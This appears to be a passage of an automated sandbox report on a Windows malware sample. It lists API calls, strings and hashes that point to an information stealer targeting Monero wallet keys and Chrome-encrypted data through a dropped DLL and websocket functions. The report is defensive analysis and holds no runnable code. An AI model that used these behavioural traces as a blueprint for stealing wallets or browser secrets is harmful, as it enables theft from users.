                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                        • String ID: <
                                        • API String ID: 1148417306-4251816714
                                        • Opcode ID: df7b11afbc6944a79a132080baa97a943ce1437bf70b4092f1ea462b2a94bb37
                                        • Instruction ID: ee51a5bc1fd587a6eb3c69c194ac582ff65deeced709dda71e10990237a93b37
                                        • Opcode Fuzzy Hash: df7b11afbc6944a79a132080baa97a943ce1437bf70b4092f1ea462b2a94bb37
                                        • Instruction Fuzzy Hash: 393161B1901228ABDB18EB90ED92FDDB7B8AF04700F445198F20577185DF756B48CF55
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00E30E10,00000000,?), ref: 00E289BF
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E289C6
                                        • wsprintfA.USER32 ref: 00E289E0
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateProcesslstrcpywsprintf
                                        • String ID: %dx%d
                                        • API String ID: 1695172769-2206825331
                                        • Opcode ID: 789f0253db3018191f401208dfdc9921706c00200ab1ee1b600dd540b421a6f0
                                        • Instruction ID: 3bc22303a0b2a9cc85fd147eb14949cc4278f1de5d2d658fcf78ad9bc8f355a6
                                        • Opcode Fuzzy Hash: 789f0253db3018191f401208dfdc9921706c00200ab1ee1b600dd540b421a6f0
                                        • Instruction Fuzzy Hash: 0A2160B1A40304AFDB14DF99DD45FAEBBB8FB48B01F104559F605BB284C77A9900CBA0
                                        APIs
                                        • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00E1A098
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                                        • API String ID: 1029625771-1545816527
                                        • Opcode ID: 37bfca5e64251d12480ba6c3ed31f571ffa8e26c2cc68334393b4a3945bc5f76
                                        • Instruction ID: c86bfabfa4275031032a60b5d4ab19d46a43d9284d05d817593453954bd5602b
                                        • Opcode Fuzzy Hash: 37bfca5e64251d12480ba6c3ed31f571ffa8e26c2cc68334393b4a3945bc5f76
                                        • Instruction Fuzzy Hash: 80F06278646300EFC7219B66E90C7A63AE4E305B00F003568F855AB184C3BE98C5C792
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00E296AE,00000000), ref: 00E28EEB
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E28EF2
                                        • wsprintfW.USER32 ref: 00E28F08
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateProcesswsprintf
                                        • String ID: %hs
                                        • API String ID: 769748085-2783943728
                                        • Opcode ID: 4a8137ea7add64987bbd1bc293c2438e786df04bdccef2edc272c053bc3be240
                                        • Instruction ID: 6184d69c83452c8ca8ca3f3f662505dea9b565c18bb1f587c25c8f26c2640605
                                        • Opcode Fuzzy Hash: 4a8137ea7add64987bbd1bc293c2438e786df04bdccef2edc272c053bc3be240
                                        • Instruction Fuzzy Hash: 21E0EC75A44309BBDB24DBD5DD0AE6D7BB8EB05B02F000198FE499B340DA769E109BD1
                                        APIs
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                          • Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,01A88B68,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
                                          • Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
                                          • Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22
                                          • Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15
                                          • Part of subcall function 00E28CF0: GetSystemTime.KERNEL32(00E30E1B,01A8E550,00E305B6,?,?,00E113F9,?,0000001A,00E30E1B,00000000,?,01A88B68,?,\Monero\wallet.keys,00E30E1A), ref: 00E28D16
                                          • Part of subcall function 00E2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E2AC82
                                          • Part of subcall function 00E2AC30: lstrcat.KERNEL32(00000000), ref: 00E2AC92
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E1AA11
                                        • lstrlen.KERNEL32(00000000,00000000), ref: 00E1AB2F
                                        • lstrlen.KERNEL32(00000000), ref: 00E1ADEC
                                          • Part of subcall function 00E2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E2AAF6
                                        • DeleteFileA.KERNEL32(00000000), ref: 00E1AE73
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                        • String ID:
                                        • API String ID: 211194620-0
                                        • Opcode ID: 8ff5b125a5899fe623410759cfdbff09bfa6b91ec628f3c387696b1c0cba93cf
                                        • Instruction ID: 834d19fa32fae14a36569f0f13313424315dec427581c1a68fd82cec259280e5
                                        • Opcode Fuzzy Hash: 8ff5b125a5899fe623410759cfdbff09bfa6b91ec628f3c387696b1c0cba93cf
                                        • Instruction Fuzzy Hash: F7E106729101289BCB14FBA4ED62EEE7379AF14300F4895A9F51776091DF316A4CCB62
                                        APIs
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                          • Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,01A88B68,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
                                          • Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
                                          • Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22
                                          • Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15
                                          • Part of subcall function 00E28CF0: GetSystemTime.KERNEL32(00E30E1B,01A8E550,00E305B6,?,?,00E113F9,?,0000001A,00E30E1B,00000000,?,01A88B68,?,\Monero\wallet.keys,00E30E1A), ref: 00E28D16
                                          • Part of subcall function 00E2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E2AC82
                                          • Part of subcall function 00E2AC30: lstrcat.KERNEL32(00000000), ref: 00E2AC92
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E1D581
                                        • lstrlen.KERNEL32(00000000), ref: 00E1D798
                                        • lstrlen.KERNEL32(00000000), ref: 00E1D7AC
                                        • DeleteFileA.KERNEL32(00000000), ref: 00E1D82B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                        • String ID:
                                        • API String ID: 211194620-0
                                        • Opcode ID: cbcabe42554e6a353b2a9bd825f38abf0e7b8ae29829b65601e79c84029a0017
                                        • Instruction ID: 2b765520036fd2cec06038a0be4cd5df2a88fe40adc88d00e8b5eed594ca17a5
                                        • Opcode Fuzzy Hash: cbcabe42554e6a353b2a9bd825f38abf0e7b8ae29829b65601e79c84029a0017
                                        • Instruction Fuzzy Hash: 07913672D101289BCB14FBA4EDA6EEE73B9AF14300F485578F51776091EF346A48CB62
                                        APIs
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                          • Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,01A88B68,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
                                          • Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
                                          • Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22
                                          • Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15
                                          • Part of subcall function 00E28CF0: GetSystemTime.KERNEL32(00E30E1B,01A8E550,00E305B6,?,?,00E113F9,?,0000001A,00E30E1B,00000000,?,01A88B68,?,\Monero\wallet.keys,00E30E1A), ref: 00E28D16
                                          • Part of subcall function 00E2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E2AC82
                                          • Part of subcall function 00E2AC30: lstrcat.KERNEL32(00000000), ref: 00E2AC92
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E1D901
                                        • lstrlen.KERNEL32(00000000), ref: 00E1DA9F
                                        • lstrlen.KERNEL32(00000000), ref: 00E1DAB3
                                        • DeleteFileA.KERNEL32(00000000), ref: 00E1DB32
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                        • String ID:
                                        • API String ID: 211194620-0
                                        • Opcode ID: dd806eb9e08378469326e0488380f1fa77cccbe6a9f34e6d065bf7315c7235a7
                                        • Instruction ID: 279a6ee8225319dc874bfb3a2534e5b3b3551fdfdd98f904384b66552a12992a
                                        • Opcode Fuzzy Hash: dd806eb9e08378469326e0488380f1fa77cccbe6a9f34e6d065bf7315c7235a7
                                        • Instruction Fuzzy Hash: A48122729101289BCB14FBA4EDA6EEE73B9AF14300F485578F50776091EF356A08CB72
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AdjustPointer
                                        • String ID:
                                        • API String ID: 1740715915-0
                                        • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                        • Instruction ID: a5a8191c12151f05d4238b09e48612d0be5ecad35ec131f8f9c0b83437aa856e
                                        • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                        • Instruction Fuzzy Hash: 9451E272600206AFEF29AF54C841BBA77B5FF01314F24652DEA0DA7691E731ED40DB90
                                        APIs
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00E1A664
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocLocallstrcpy
                                        • String ID: @$v10$v20
                                        • API String ID: 2746078483-278772428
                                        • Opcode ID: 20093484f9adeb8a4f70307dc89445f11f54ae4ea34f8e57422b7fb13496e920
                                        • Instruction ID: cc090cc6cc932f646edc29601f60bcf28115458f8e96c97c40365b7ae545ac19
                                        • Opcode Fuzzy Hash: 20093484f9adeb8a4f70307dc89445f11f54ae4ea34f8e57422b7fb13496e920
                                        • Instruction Fuzzy Hash: F6513DB0A10208EFDB14EFA4DD96BED77B6BF40344F08A128F90A7B191DB706A45CB51
                                        APIs
                                          • Part of subcall function 00E2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E2AAF6
                                          • Part of subcall function 00E1A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E1A13C
                                          • Part of subcall function 00E1A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E1A161
                                          • Part of subcall function 00E1A110: LocalAlloc.KERNEL32(00000040,?), ref: 00E1A181
                                          • Part of subcall function 00E1A110: ReadFile.KERNEL32(000000FF,?,00000000,00E1148F,00000000), ref: 00E1A1AA
                                          • Part of subcall function 00E1A110: LocalFree.KERNEL32(00E1148F), ref: 00E1A1E0
                                          • Part of subcall function 00E1A110: CloseHandle.KERNEL32(000000FF), ref: 00E1A1EA
                                          • Part of subcall function 00E28FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E28FE2
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                          • Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,01A88B68,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
                                          • Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
                                          • Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22
                                          • Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15
                                          • Part of subcall function 00E2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E2AC82
                                          • Part of subcall function 00E2AC30: lstrcat.KERNEL32(00000000), ref: 00E2AC92
                                        • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00E31678,00E30D93), ref: 00E1F64C
                                        • lstrlen.KERNEL32(00000000), ref: 00E1F66B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
